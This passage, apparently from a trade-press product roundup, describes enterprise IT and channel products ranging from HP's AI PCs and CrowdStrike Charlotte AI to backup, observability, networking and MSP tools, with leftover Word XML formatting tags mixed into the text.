them.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HP EliteBoard G1a Next Gen AI PC</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HP EliteBoard G1a Next Gen AI PC introduces an entirely new category of business computing: A keyboard PC that integrates the full capabilities of a desktop AI PC packaged into a sleek keyboard form factor. Instead of requiring a traditional tower, mini PC or laptop dock, the EliteBoard contains the processor, NPU, graphics, audio, and connectivity within the keyboard itself. Users can simply connect it to a display and instantly have a complete AI-powered desktop environment.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Powered by AMD Ryzen AI processors with up to 50 TOPS of local AI performance, the device enables on-device AI workloads, modern productivity tools, and real-time collaboration while maintaining enterprise-grade security through HP Wolf Security. The EliteBoard G1a is designed for enterprise customers, hybrid workers, and organizations adopting flexible workspaces, where simplicity and powerful AI computing are critical.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HP ZGX Nano G1n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HP ZGX Nano G1n is a compact, high-performance AI workstation, and the first system built on HP's ZGX platform, to bring advanced AI development and inference directly to the desktop.</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Powered by the Nvidia GB10 Grace Blackwell Superchip, it supports models up to 200 billion parameters on a single system and can scale through linked devices or integrate with higher-performance systems such as the HP ZGX Fury. Preloaded with Nvidia's DGX software stack and supported by HP ZGX Toolkit (a free VS Code extension), it delivers a faster path from setup to first results.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Toolkit enables instant device discovery, streamlined SSH access, and an application library for open-source frameworks, automated model evaluation via Ollama, and streamlined local model serving with flexible export and deployment options.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target market includes AI developers, enterprise teams, and research organizations, as well as regulated sectors requiring secure, offline AI capabilities in air-gapped environments.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AI Software And Platforms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CrowdStrike Charlotte AI</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 adversaries weaponize AI to scale attacks faster than defenders can respond, Charlotte AI gives defenders the speed advantage, elevating analysts from alert handlers to orchestrators of the agentic SOC. Built for enterprise and midmarket organizations, it powers intelligent agents trained on years of expertise from the world's top SOC operators to automate time-consuming tasks across the security lifecycle, freeing analysts to focus on the strategic decisions that strengthen security.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Charlotte AI operates within a model of bounded autonomy, enabling security teams to maintain full oversight of AI-driven decisions and define when and how AI-driven and automated actions occur. Recently, CrowdStrike became one of the first cybersecurity companies to achieve ISO 42001 certification, the world's first AI management system standard.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Dell AI Data Platform With Dell Orchestration Engine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Dell AI Data Platform with Data Orchestration Engine builds on Dell's leadership in infrastructure to deliver a unified system for AI data. It brings together high-performance storage, GPU-accelerated processing, and data orchestration to transform raw, siloed enterprise data into trusted, AI-ready assets.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Data Orchestration Engine extends Dell AI Data Platform by automating the full AI data lifecycle - from discovery and labeling to enrichment and transformation of structured, unstructured, and multimodal data into governed datasets at scale. With a no-code/low-code approach, it enables both technical and business teams to operationalize AI pipelines faster.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Integrated with Nvidia NIM microservices, AI Blueprints and a Marketplace of 200+ pre-built workflows, the platform accelerates time to production. GPU-accelerated analytics and vector processing deliver up to 12x faster indexing and 3x faster data preparation, forming the data foundation for the Dell AI Factory with Nvidia.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Red Hat Enterprise Linux 10</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Red Hat Enterprise Linux (RHEL) 10 is an enterprise-grade, open-source operating system that delivers a consistent, production-ready foundation for hybrid cloud and AI workloads, from on-premise data centers to major public clouds including AWS, Azure, and Google Cloud. RHEL 10 serves as the bedrock for Red Hat's AI solutions portfolio, underpinning Red Hat AI Inference Server, Red Hat OpenShift AI, and Red Hat Enterprise Linux AI. RHEL 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>combines decades of Red Hat's Linux expertise with AI technologies to deliver proactive guidance and recommendations for enterprise IT teams and Linux administrators across regulated industries, hybrid cloud environments, and organizations managing large-scale, distributed infrastructure who need a secure, AI-ready operating foundation.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Snowflake Cortex Code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Cortex Code is a data-native AI coding agent that accelerates enterprise data and AI development by understanding the full data lifecycle. Embedded into Snowflake's AI Data Cloud, it leverages deep awareness of data context, compute, governance, and semantics to automate workflows across data engineering, analytics, machine learning, and agent development.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 the builder layer for enterprise AI, Cortex Code helps teams move faster from idea to production using natural language, simplifying complex tasks while remaining secure and governed. It reduces manual work and helps teams deliver AI-driven apps with greater confidence. Cortex Code CLI extends these capabilities into local data sources and environments, delivering secure, context-aware assistance wherever teams work.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Drastically accelerating time-to-value, Cortex Code bridges business intent and technical execution, empowering teams to focus on innovation and business outcomes. Since launching in November 2025, it has been adopted by 4,000+ users, including United Rentals, Fanatics, and WHOOP.</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Zoom Communications AI Companion 3.0</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AIC 3.0 is an agentic AI solution embedded within Zoom's platform across Zoom Workplace and Zoom Business Services that transforms conversations into completed work. It supports users before, during, and after meetings by helping users get more done, generating agendas, summarizing discussions, capturing notes, and automatically producing follow-ups such as tasks and emails. It also features agentic workflows that can streamline work across meetings, documents, and connected apps and assist with drafting and editing content.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key enhancement is its AI Companion web browser interface (ai.zoom.us), a conversational work surface accessible directly via desktop browser. This allows users to interact with AI Companion, access real-time context across tools, and turn conversations into structured outputs without switching applications.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AIC is designed for organizations of all sizes, delivering value across key personas including IT decision makers, knowledge workers, sales/marketing leaders, customer service/support managers, and HR/operations leaders.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Application Development And DevOps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Launch Darkly Platform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LaunchDarkly platform helps DevOps teams ship software faster, safely, and with far greater control. Serving over 5,500 global enterprises - including 25 percent of the Fortune 500 - across financial services, healthcare, media, and retail, the platform separates deployment from release, enabling teams to roll out features incrementally, monitor real- world performance, and roll back instantly without taking systems offline.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Two recent updates anchor the platform's latest evolution: Guarded Releases and AI Configs. Guarded Releases enables teams to deploy incrementally while automatically monitoring feature-level impact - catching regressions before they reach users. AI Configs extends feature management to GenAI applications, giving teams runtime control over prompts and models without redeployment. Together, they address the twin pressures of rising release velocity and unpredictable AI-generated code in production, giving engineering teams the guardrails to move fast without breaking things.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SmartBear BearQ</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SmartBear BearQ is an agentic QA system that autonomously explores, tests, and validates applications. BearQ discovers user workflows, generates and maintains tests, and continuously validates application behavior as the application changes. It's always-on agents, including the QA Lead Agent, Explorer Agent, and Tester Agent, act as QA teammates, expanding coverage and reducing the need for ongoing test maintenance. This enables teams to keep pace with AI-driven development while maintaining confidence in quality.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BearQ is designed for product engineering and QA teams at organizations that need to scale testing, remove bottlenecks, and ensure applications work as intended in fast-moving environments.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Sonar SonarQube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SonarQube Cloud is a fully managed, elastic SaaS analysis solution providing real-time code quality and security verification. Its latest enhancement, SonarQube Architecture, delivers structural integrity to AI- accelerated development. It automatically reverse-engineers codebases to visualize live architecture, enabling teams to formalize design blueprints as code.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executing automated reviews, it detects "architectural drift" in real- time-a critical risk as AI agents rapidly inflate code volume. It integrates directly into developer workflows, surfacing structural violations within the Quality Gate to stop technical debt from compounding. It targets enterprise DevOps teams, software architects, and CTOs managing complex, large-scale application portfolios. It's purpose-built for organizations adopting AI-native development, where maintaining a modular, secure structural framework is essential to prevent AI-generated code from becoming an unmanageable black box. By bridging design and implementation, it ensures long-term maintainability and enterprise agility.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Application Performance/Observability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Dynatrace Intelligence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Dynatrace Intelligence is an AI-powered observability platform that combines grounded data with agentic AI that can reason and take action, allowing teams to detect issues, identify root causes and automate remediation. The platform empowers organizations to build more resilient applications, elevate customer experiences, and drive autonomous action across modern digital ecosystems.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Dynatrace Intelligence is built for large enterprises and digital-native organizations operating complex, cloud-native and AI-driven environments with mature DevOps and SRE practices, and for enterprises seeking to move from traditional monitoring to automated, autonomous operations at scale across hybrid and multi-cloud systems.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New Relic Intelligent Observability Platform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New Relic Intelligent Observability Platform is the only open, AI- strengthened platform designed to unify telemetry and business outcomes, bringing intelligence and automated actions to the most complex digital environments. Recent innovations include: Agentic platform: A no-code builder that enables teams to automate workflows, reduce manual work, accelerate incident response, and strengthen operational resilience.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SRE Agent: An always-on AI teammate that supports triage, change management, incident lifecycle management, and root cause analysis. As a result, engineers spend less time firefighting and more time driving strategic initiatives.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Intelligent Workloads: Automatically maps service and system dependencies and connects system health to user impact and business outcomes. By doing so, observability is being transformed into a strategic driver of revenue and improved customer experiences.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Together, these capabilities enable channel partners to scale operations more efficiently, improving service delivery while reducing reliance on linear headcount growth.</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Zscaler Digital Experience Network Intelligence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Zscaler Digital Experience (ZDX) Network Intelligence is an AI-powered network observability solution providing end-to-end visibility from device to application across last-mile ISPs, intermediate carriers, and Zscaler data centers.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Functionality: Lightweight Client Connector probes run every five minutes to measure latency, packet loss, and jitter along the user's actual path. Machine learning baselines normal behavior and flags deviations, so teams can pinpoint root causes, drill from ISP/ASN to hop-level devices, visualize severity by geography, benchmark best/worst ISPs, gauge peer impact, and steer traffic or data center selection to avoid degraded routes.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Target market: Enterprise IT operations, network engineering/SRE, and service desk teams supporting distributed workforces that require reliable SaaS and internet connectivity and strict SLAs in zero-trust, internet- routed environments.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Intelligence And Data Analytics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Hydrolix Bot Insights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Bot Insights provides organizations with clear visibility into how AI- driven crawlers and agents interact with their websites and web applications. With unified real-time analytics across the world's top CDNs, Bot Insights equips businesses with understanding and acting on bot behavior in real time while exploring months or years of historical trends in seconds.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Bot Insights, e-commerce, finance, travel, media and other digital businesses now have a clear view of how AI and other bot traffic drives revenue losses and gains, increases infrastructure costs, and erodes search acquisition.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Powered by the Hydrolix Real-Time Data Platform, the initial release ingests and correlates massive volumes of bot and crawler activity data in seconds, enabling precise classification of bot behaviors and identification of AI bot and agentic AI requests across web properties.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Unlike traditional approaches that rely on sampling or limited retention windows, Hydrolix enables long-term, cost-effective, full-fidelity analytics and data retention.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Cohesity Gaia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Cohesity Gaia on-premises extends Cohesity Gaia's AI-driven knowledge discovery capabilities to environments where data must remain on-premises for security, compliance, or performance reasons. While organizations are eager to adopt AI, much of their most valuable unstructured data is stored in on-prem backup systems, putting it out of reach for analytics and AI initiatives. Gaia on-prem allows enterprises to search and extract insights from this protected data without moving it to the cloud or introducing new governance risk.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Built on the Cohesity Data Cloud and powered by Nvidia AI Enterprise, Gaia on-prem helps organizations turn existing backup data into a usable source of insight, supporting research, analysis, and operational decision-making while maintaining full control over data access and locality.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Cloud Management And Optimization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Cloudaware Cloud Management Platform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Cloudaware is a multi-cloud management and security platform that provides a unified Configuration Management Database (CMDB) for complex hybrid environments. It automatically discovers and cross-references over 3,000 asset types across AWS, Azure, GCP, VMware, and on-premises infrastructure. Key functionalities include real-time asset inventory, vulnerability management, compliance monitoring against frameworks like PCI and NIST, and FinOps cost optimization.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target market consists of large-scale multi-cloud enterprises, government agencies, and regulated organizations requiring deep operational excellence and visibility across tens of thousands of resources.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VMware Cloud Foundation 9.0</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VMware Cloud Foundation 9.0 is the industry's first AI-native private cloud platform that delivers infrastructure at the speed of developers while maintaining enterprise control, security, and cost transparency.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Designed for organizations running on mission-critical workloads across hybrid environments, VCF 9.0 enables AI and traditional applications to operate together within a single operating model. By bringing together public cloud agility and on-premises performance, it reduces reliance on separate infrastructure stacks and fragmented toolchains.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VCF 9.0 unifies compute, storage, networking, automation, and security into one platform and delivers: AI-ready infrastructure with integrated GPU support and model services Self-service, GitOps-driven automation with built-in governance, fleet-wide lifecycle management and observability from a single interface, and built-in sovereign security, compliance, and cyber resilience. It offers measurable cost efficiency, including up to 38 percent lower memory/server TCO and 34 percent lower storage TCO.</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Data And Information Management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Qumulo Data Platform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Qumulo Data Platform is a software-defined file data platform that enables organizations to store, manage, and access massive volumes of unstructured data across on-premises, edge, and public cloud environments. It delivers high-performance file storage with real-time visibility, analytics, and automation, allowing teams to monitor capacity, performance, and data usage as they scale. The platform supports hybrid and multi-cloud workflows, simplifies data mobility, and provides built-in data protection features such as snapshots and replication for resiliency.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Qumulo is designed for data-intensive industries-including media and entertainment, life sciences, healthcare, manufacturing, and research organizations-as well as enterprises running AI/ML and high-performance computing workloads. Its target users are IT, infrastructure, and data teams that need scalable, flexible, and cloud-integrated file storage to support modern, distributed applications and workflows.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Datadobi StorageMAP Storage Optimizer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Datadobi Advanced Storage Optimizer is a solution within the StorageMAP platform that helps enterprises gain clear visibility into their storage environments to reduce costs and improve efficiency. It identifies suboptimal use of storage tiers, flags aging and unused data, and enables users to model migration scenarios before committing to them. It also suggests archiving options, generates stakeholder-ready reports, and continuously monitors storage environments to keep systems efficient over time.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product targets large enterprises, particularly IT leaders and storage teams, grappling with explosive data growth, rising storage costs, and mounting governance pressures who need to transform unstructured data from a financial liability into a strategic asset.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YugabyteDB</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YugabyteDB is a cloud-native, distributed, Postgres-compatible database built to help companies run always-on, data-intensive applications, especially those powered by AI, without the complexity and cost of traditional systems.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Many organizations rely on multiple databases and tools to manage transactions, analytics, and AI workloads. This creates silos, delays, and operational risk. YugabyteDB simplifies data infrastructure by consolidating everything into a single data infrastructure, enabling organizations to build, scale, and run applications more efficiently. It automatically distributes data and keeps applications running even during outages, allowing companies to deliver fast, reliable user experiences anywhere in the world. By eliminating the need for separate systems and reducing manual data management, it lowers infrastructure costs and accelerates time-to-market for new AI-driven services.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Designed for enterprises in complex industries like finance and eCommerce, YugabyteDB is trusted by leaders like Shopify and Kroger to power mission- critical applications at a global scale.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Data Protection, Management And Resiliency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Cohesity RecoveryAgent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Cohesity RecoveryAgent is a purpose-built, AI-powered cyber recovery orchestration solution that helps organizations respond to ransomware, disasters, and data disruptions faster and with greater confidence. Modern recovery is challenged by fragmented tools, manual processes, and untested plans spread across on-premise, virtual, and cloud environments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>RecoveryAgent simplifies this complexity using intelligent, blueprint- driven workflows that automate recovery preparation, testing, compliance, and response.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Organizations can rehearse recoveries in safe, non-production environments, validate real-world recovery times against business SLAs, and coordinate recovery actions across hybrid infrastructure when incidents occur. By turning recovery plans into living, executable workflows rather than static documentation, RecoveryAgent helps organizations move from reactive recovery efforts to more predictable, repeatable, and confidence-driven recovery outcomes when disruption is inevitable.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Commvault Cloud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Commvault Cloud is a unified cyber resilience platform designed to deliver AI-powered data protection, proactive threat detection, advanced ransomware recovery, and a single operational view across enterprise environments. The platform goes beyond data recovery to enable continuous business operations at enterprise scale, helping organizations resume operations quickly, securely, and with confidence following cyber incidents.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Customers across verticals have access to tailored solutions that address their specific needs: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-Federal government: Following an outage or cyberattack, Commvault Cloud can help federal institutions rebuild and restore critical cloud-based government applications to enable continuous operations.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-Financial services: With Commvault Cloud, customers can protect financial data with automated, policy-driven solutions that help ensure regulatory compliance and data security.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-Healthcare: Healthcare providers can meet HIPAA compliance and protect patient data with advanced backup, recovery, and encryption solutions.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-Education: Commvault Cloud can help secure educational data with scalable, cost-effective protection solutions designed for institutions of all sizes.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ControlMonkey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ControlMonkey is an infrastructure governance and resilience platform that enables organizations to recover the configurations that power modern cloud environments, not just their data. The platform continuously captures real- time cloud and SaaS configurations, including resources managed outside Infrastructure-as-Code (IaC), converts them into deployable definitions, and stores versioned recovery points in the customer's Git. This enables fast, reliable restoration of individual resources or full environments during outages, misconfigurations, or cyber incidents.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2026, ControlMonkey expanded its disaster recovery capabilities across the full cloud control plane, including network infrastructure, observability platforms, and identity providers, ensuring organizations can recover systems and access, dramatically reducing downtime and operational risk.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HYCU R-Shield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HYCU R-Shield is the cyber resilience capability within the HYCU R-Cloud Platform, designed to protect, detect and recover data across SaaS, cloud, on-prem, and AI environments. It extends beyond traditional backup by helping organizations identify risk, secure data with immutable copies, and recover quickly from ransomware and other cyber incidents.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solution providers, systems integrators, and VARs, R-Shield simplifies how cyber resilience is delivered to customers. It integrates directly into a single platform that protects over 103 SaaS and cloud service workloads, eliminating the need for multiple point solutions across backup, security, and recovery. Recent enhancements, including integration with new partners like Halcyon, strengthen ransomware detection and response, enabling faster recovery with greater confidence.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R-Shield is built for partners serving mid-market and enterprise customers who need to secure distributed data environments while maintaining control, reducing complexity, and ensuring uninterrupted business continuity.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Object First Ootbi Mini</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October 2025 Object First introduced Ootbi Mini, a compact, immutable backup storage appliance designed for remote and branch offices, edge environments, and small businesses to ransomware-proof local Veeam backup data.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Built on Zero Trust principles, the Ootbi Mini delivers absolute immutability; no one, not even an administrator, can alter the firmware, operating system, storage layer, or backup data. Available as a CapEx purchase or a Consumption-based subscription, it brings the same ransomware- proof data protection, intuitive UI, and simple Veeam integration as the existing Object First appliance fleet-no security expertise required.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company also introduced the honeypot feature in version 1.7 for Veeam Backup &amp; Replication administrators seeking early warning of cyberthreats that may be dwelling in an IT environment. It is enabled with a single- click decoy that resides on a securely segmented portion of an Object First appliance and proactively sends alerts when suspicious activity is detected.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Veeam Data Platform v13</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Veeam Data Platform v13 is a groundbreaking release that redefines the standard for cyber resilience, intelligent data protection, and data freedom in the AI era. This release represents a fundamental evolution of the industry's most trusted data platform. Built for a world defined by relentless ransomware, rapid infrastructure transformation, and AI innovation, Veeam Data Platform v13 delivers unprecedented resilience, unmatched flexibility, and the intelligence needed for the AI-powered future.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Veeam Data Platform fuses backup, cyber detection, forensics, and AI-driven remediation into a single data resilience platform so organizations can not only recover fast, but recover clean and with confidence.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introduces Recon Scanner 3.0, which flags suspicious behaviors (e.g., brute force, abnormal file/network activity), centralizes findings in a Triage Inbox, and maps forensic evidence to the MITRE ATT&amp;CK framework for actionable threat context. V13 also adds a Malware Analysis AI Agent to automatically classify suspicious activity and guide remediation, while strengthening identity and access controls (SAML SSO, least privilege) and making backups immutable by default.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Beyond security, V13 accelerates modernization with Instant Recovery to Microsoft Azure (including cleanroom validation), broader hypervisor support, and a Universal Hypervisor Integration API designed to future- proof protection across emerging virtualization platforms.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Edge Computing/Internet Of Things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Asimily Cyber Asset &amp; Exposure Management Platform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Asimily is a next-generation cyber asset and exposure management platform for IT, IoT, OT, and IoMT environments serving healthcare, manufacturing, energy, financial services, and government organizations. Its 2025-2026 platform </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>releases deliver three major capability expansions that advance the platform from risk visibility into complete, operationalized risk reduction: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Enhanced microsegmentation capabilities - including new Security Group Access Control List (SGACL) support for Cisco Identity Services Engine (ISE) - enable organizations to translate Asimily's device classification and risk intelligence into enforceable network segmentation policies;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IoT Password Management automates credential enforcement across multi- manufacturer device fleets, addressing a persistent attack vector that legacy tools handle inconsistently;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Expanded IoT Patching manufacturer support - up 200 percent since the initial release, with a 400-percent expansion on track within a year - dramatically increases the share of customer device fleets that can be automatically updated.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platform is available through channel partners including Carahsoft and Liquid PC.</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Ericsson Cradlepoint R2400</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Ericsson Cradlepoint R2400 is a ruggedized, in-vehicle 5G Standalone (SA) router engineered for mission-critical mobility. It delivers resilient, always-on connectivity across cellular, LEO and LAN networks, and when paired with the RC1250 5G SA captive modem, supports up to five active cellular modem connections.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Centrally managed through the cloud-based NetCloud Manager platform, the solution enables zero-touch deployment, real-time visibility, security policy enforcement, and lifecycle management at scale. The R2400 supports edge computing through Docker-based containers, SD-WAN capabilities such as intelligent traffic steering, link bonding, flow duplication, and forward error correction, as well as advanced positioning and high-performance Wi- Fi.</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Designed for public safety, mass transit, and commercial fleet operators, the R2400 ensures uninterrupted access to critical applications, real-time communications, and data-driven operations when reliability matters most.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Scale Computing Fleet Manager (SC//Fleet Manager) Edge Orchestration Solutions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SC//Fleet Manager edge orchestration solution is a cloud-hosted command platform built for edge infrastructure and application delivery at scale. From zero-touch deployment and fleet-wide observability to automatic updates and application lifecycle orchestration, it enables secure, centralized control of clusters running SC//HyperCore virtualization suite from a single cloud interface.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Designed for companies that operate highly distributed operations (retail/healthcare/finance/manufacturing), SC//Fleet Manager lets IT leaders quickly scale from one to 50,000-plus clusters. Built on a zero- trust model with encrypted, outbound-only connections-no VPNs, agents, or open ports-SC//Fleet Manager consolidates a user's SC//HyperCore clusters' real-time conditions and resource utilization onto a single pane of glass.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product features role-based access control for unlimited users, ensuring security without compromising control; allows for full-stack visibility across all clusters and workloads without installing additional software or agents; and applies firmware upgrades across clusters with a single click.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Zscaler Cellular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Zscaler Cellular brings Zero Trust security to cellular-connected IoT and OT devices through a simple SIM-based approach. By inserting a Zscaler Cellular SIM into a device-without adding software or VPNs-organizations can connect securely to cellular networks worldwide while isolating each device on its own "private island." Every packet is routed through the Zscaler Zero Trust Exchange, delivering continuous visibility into device behavior and granular, real-time policy enforcement at the network edge.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Security teams can detect and stop risky activity (e.g., unexpected foreign connections), restrict usage by country/region, and block anomalous access attempts before traffic reaches the internet or private apps. Target customers include enterprises and public-sector organizations securing smart infrastructure, industrial systems, logistics, retail, and other large-scale cellular IoT/OT deployments.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Infrastructure Monitoring And Management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Auvik IT Management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Auvik is a unified cloud-based IT management platform that empowers IT teams to proactively manage diverse networks, security devices, endpoints, and SaaS applications. Auvik manages one million network devices and three million SaaS applications across 100,000 networks and provides monitoring services for more than 10 million devices.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Historically, IT teams have been forced to rely on fragmented tools to manage different parts of their environment (network devices, servers, and endpoints) leading to siloed visibility, slower troubleshooting, and increased operational overhead. Auvik IT Management eliminates this complexity by delivering infrastructure visibility through a single interface with rapid deployment and minimal configuration.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automated network discovery and mapping, integrated server and endpoint network monitoring, and intelligent alerting, Auvik IT Management enables IT teams to proactively manage performance, reduce downtime, and streamline operations without the burden of managing multiple tools.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Schneider Electric EcoStruxure IT Expert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EcoStruxure IT Expert is Schneider Electric's cloud-based, multi-tenant DCIM platform built for channel partners. It delivers secure, vendor- neutral monitoring and management of customer IT infrastructure from a single rack to multi-site enterprise environments with actionable insights that drive uptime, efficiency, and new revenue streams.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During Nvidia GTC 2026, EcoStruxure IT Expert introduced agentic AI alarm management, which autonomously analyzes real-time IoT data to identify root causes of infrastructure alerts, including UPS battery degradation and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>environmental anomalies, and recommend corrective actions. New capabilities also include a Hardware Refresh Report for proactive UPS and battery end-of- life planning, a UPS Downtime Report that quantifies protection events by location, PUE Reporting under Lifecycle Assessments, 30-day NetBotz video clip cloud storage, and open API endpoints supporting RMM and ticketing integration.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Target markets: SMBs through enterprise data centers, colocation facilities, IT Operations teams, and MSP/VAR channel partners.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Fleet - Premium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Fleet is an open-source device management platform that provides real-time visibility and control across endpoints. Fleet emphasizes live data access, continuous monitoring, and endpoint telemetry rather than relying solely on static inventory and policy enforcement. It supports automation through APIs, GitOps and command-line workflows, enabling teams to query devices, detect security issues, and respond to incidents.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Fleet's normal target customer is a mid-market to enterprise DevOps- driven organization and engineering-centric companies, our user base includes some of the largest, most innovative companies in the world, all the way to five-seat organizations and everything in between.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NetBrain Next-Gen R12</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NetBrain is an agentic NetOps platform that accelerates how network operations teams discover, diagnose, remediate, change, and assess their networks across hybrid and multi-vendor environments. Built on a discovery and automation engine, NetBrain augments engineers with the context, intelligence, and automated workflows needed to resolve problems faster and prevent outages before they occur.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Its core capabilities include: o Agentic troubleshooting - automated diagnostics, agentic deep diagnosis, runbook execution, and auto- remediation o Change management - pre/post change validation and compliance enforcement o Continuous assessment - proactive network health, performance, lifecycle, usage, security validation, and risk detection.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NetBrain targets enterprise IT and network operations teams, as well as managed service providers, managing large-scale, complex infrastructure who want to shift from reactive, labor-intensive troubleshooting to proactive, intelligence-driven network operations.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OpenGear CM8000 Console Server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Opengear CM8000 Console Server is a compact, purpose-built Out-of-Band (OOB) management appliance designed to keep critical infrastructure reachable when the production network is down. Supporting four or eight serial ports with Cisco Straight X2 pinout and SmartOOB technology, CM8000 delivers secure serial console access, integrated PDU support for remote power cycling, and flexible Ethernet uplinks via RJ-45 and SFP connectors.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Built on a quad-core ARM Cortex-A53 platform with 4GB LPDDR4 RAM and 32GB storage, it provides the compute performance needed for fast recovery and on-device Python/Docker automation. The CM8000 integrates seamlessly with Opengear Lighthouse for centralized visibility and provisioning across distributed locations. It is purpose-built for branch offices, retail locations, network closets and remote edge environments where rack space is limited but uptime is critical.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Xurrent ITxM Platform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Xurrent is an AI-powered IT Service Management platform that goes beyond the traditional service desk. Its ITxM (IT Anything Management) architecture unifies service management and IT operations into a single platform, giving organizations a shared source of truth across teams and tools.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creates natural expansion opportunities: 70 percent of Xurrent customers already use the platform for enterprise service management, extending workflows into HR, facilities, finance, and other departments. Xurrent's open integration framework lets partners build custom connectors and automations tailored to each customer's environment. The platform's Incident Management and Response (IMR) capabilities give partners a consultative role in helping organizations redesign how they detect, respond to and resolve incidents.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deployments lasting four to 16 weeks and weekly product releases requiring zero maintenance windows, partners spend less time on infrastructure and more time driving business outcomes.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MSP Platforms And Tools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Atera: Robin by Atera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Robin by Atera is an autonomous agent that detects, diagnoses and resolves technical IT issues on devices, in the network and on the cloud, to significantly increase end-user productivity and reduce frustration with IT systems. Robin eliminates tier-1 tickets to streamline technician workload.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Robin's reasoning engine is trained on Atera's vast store of knowledge acquired over resolution of 1 million tickets per month and utilizes Atera's superior on-device agent to fix problems.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Cavelo Flash</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Cavelo is redefining risk posture assessments as a business driver by modernizing, streamlining and unifying the process, making it faster, easier, and more cost-effective for service providers to assess and communicate insights and tangible recommendations. Cavelo Flash acts as a strategic business lever, giving emerging MSPs a simple, low-friction way to enter the cybersecurity risk space.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 customers demand faster, measurable insights, Flash delivers a prospecting tool that helps providers demonstrate value, win and retain business.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ControlUp For MSPs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ControlUp for MSPs is a purpose-built digital employee experience (DEX) platform designed specifically for managed service providers (MSPs). It combines real-time endpoint monitoring, remediation, and analytics with a multi-tenant management architecture that allows MSPs to centrally manage multiple customer environments from a single console.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platform captures thousands of real-time performance and user experience metrics via three-second telemetry across endpoints, enabling proactive issue detection, automated remediation, and faster troubleshooting. Integrated automation and "shift-left" capabilities reduce manual effort and help prevent issues before they impact users.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ControlUp for MSPs targets mid-market and enterprise environments served by MSPs, enabling partners to deliver high-value managed endpoint and experience services at scale. It is ideal for MSPs looking to expand beyond traditional RMM tools and build differentiated, service-led offerings around endpoint performance and digital experience.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Inforcer Copilot Readiness Assessment And Copilot Manager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inforcer's Copilot Readiness Assessment and Copilot Manager enable MSPs to securely prepare, deploy, and govern Microsoft Copilot across every customer tenant at scale. As organizations rush to adopt AI, most Microsoft environments aren't properly configured. Misconfigured permissions, data overexposure, and inconsistent policies introduce significant risk.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Inforcer solves this by enabling MSPs to assess readiness across all tenants in minutes, identify security gaps, remediate issues through automated policy enforcement, and continuously govern Copilot environments post-deployment. Copilot Manager extends this by providing multi-tenant visibility into adoption trends, spotlighting power users, tracking app usage, and monitoring data activity. It also surfaces Shadow AI risks, helping MSPs identify high-risk customers, inform QBRs, and uncover opportunities to upsell security and compliance services.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Together, these capabilities transform Copilot from a risky rollout into a secure, scalable, and revenue-generating service for MSPs.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WatchGuard FireCloud Total Access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WatchGuard FireCloud Total Access is the first hybrid SASE service purpose- built for managed service providers and the small and midsize businesses that most enterprise SASE vendors have largely overlooked.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brings Firewall as a Service, Secure Web Gateway, Zero Trust Network Access, and identity together in one cloud platform managed through WatchGuard Cloud. It protects remote and hybrid workers from Internet-based threats and replaces legacy VPNs with identity-based, per-session access to private and SaaS applications.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SASE solutions assume you have enterprise budgets and a dedicated security team. FireCloud Total Access doesn't. It deploys in hours through a single agent, with no hardware to install and no complex configuration to manage. Security services come switched on by default, so partners can protect customers from day one.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Available across North America and globally through WatchGuard's network of nearly 17,000 MSPs and resellers serving small and midsize businesses.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Networking Enterprise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Lantronix SISPM1242-582-LRT Managed PoE++ Switch</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SISPM1242-582-LRT is a managed PoE++ switch suitable for connecting and powering devices in hardened environments providing 90W power, 2.5G PoE/Access ports, and 10G open SFP uplinks. It has (4) 10/100/1000 and (4) 100M/1G/2.5G PoE++ ports with (2) 1G/10G dual speed SFP+ slots. The switch can support PoE++ on (4) ports and PoE+ on all (8) ports. This provides an economical mix of PoE power, and bandwidth to support common cameras, advanced PTZ and HD cameras, IoT gateways, and wireless access points.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SISPM1242-582-LRT is a hardened switch, certified to operate reliably in harsh environments such as those found on factory floors, outdoor enclosures or other challenging environments.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Zayo DynamicLink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Enterprise networks face unprecedented pressure from AI workloads, distributed workforces, and multi-cloud adoption. Traditional connectivity models were not designed for the level of scale, complexity, or volatility of today's business environment. Enterprises need networks that can adapt in real time without sacrificing control for visibility.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DynamicLink is Zayo's Network-as-a-Service (NaaS) platform that transforms how enterprises connect, protect, and operate their network across core, cloud, and edge environments. Through a self-service portal, enterprises now have the power to turn up, scale, and configure their network connectivity services in minutes rather than days. These capabilities span Zayo's entire network footprint, the largest independent network provider in North America, with 28,000 on-net enterprise locations and 1,200+ data centers.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built-in security, observability, and an AI interface, DynamicLink provides enterprises with true network agility at scale, aligning network performance directly with evolving business needs.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Networking SMB</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Auvik Network Management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Auvik is a cloud-based IT management platform that empowers IT teams to proactively manage diverse networks, security devices, endpoints, and SaaS applications. Auvik manages one million network devices and three million SaaS applications across 100,000 networks and provides monitoring services for more than 10 million devices.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In September 2025, Auvik introduced Smart Alert Suppression within Auvik Network Management (ANM) to reduce alert noise and deliver more precise and actionable insights. Paired with Auvik's leading network mapping capabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
